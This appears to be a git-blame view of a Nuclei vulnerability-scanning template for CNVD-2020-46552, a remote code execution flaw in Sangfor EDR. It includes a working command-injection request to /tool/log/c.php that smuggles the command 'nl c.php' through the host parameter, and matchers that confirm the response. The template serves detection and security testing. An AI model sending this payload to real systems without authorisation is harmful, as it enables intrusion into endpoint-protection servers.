2022-05-14 11:05:15 +00:00
id : CNVD-2020-46552
2022-05-18 20:58:07 +00:00
2022-05-14 11:05:15 +00:00
info :
2022-05-18 20:58:07 +00:00
name : Sangfor EDR - Remote Code Execution
2022-05-14 11:05:15 +00:00
author : ritikchaddha
severity : critical
2022-05-18 20:58:07 +00:00
description : Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
2022-05-14 11:05:15 +00:00
reference :
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
2022-05-18 20:58:07 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-05-14 11:05:15 +00:00
tags : cnvd,cnvd2020,sangfor,rce
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-05-14 11:05:15 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-14 11:05:15 +00:00
- method : GET
path :
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
2022-05-14 16:53:47 +00:00
2022-05-14 11:05:15 +00:00
matchers :
2022-05-14 16:51:49 +00:00
- type : dsl
dsl :
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
2022-05-15 10:52:18 +00:00
- 'contains(body, "Log Helper")'
2022-05-14 16:51:49 +00:00
- 'status_code == 200'
2023-07-06 05:54:47 +00:00
condition : and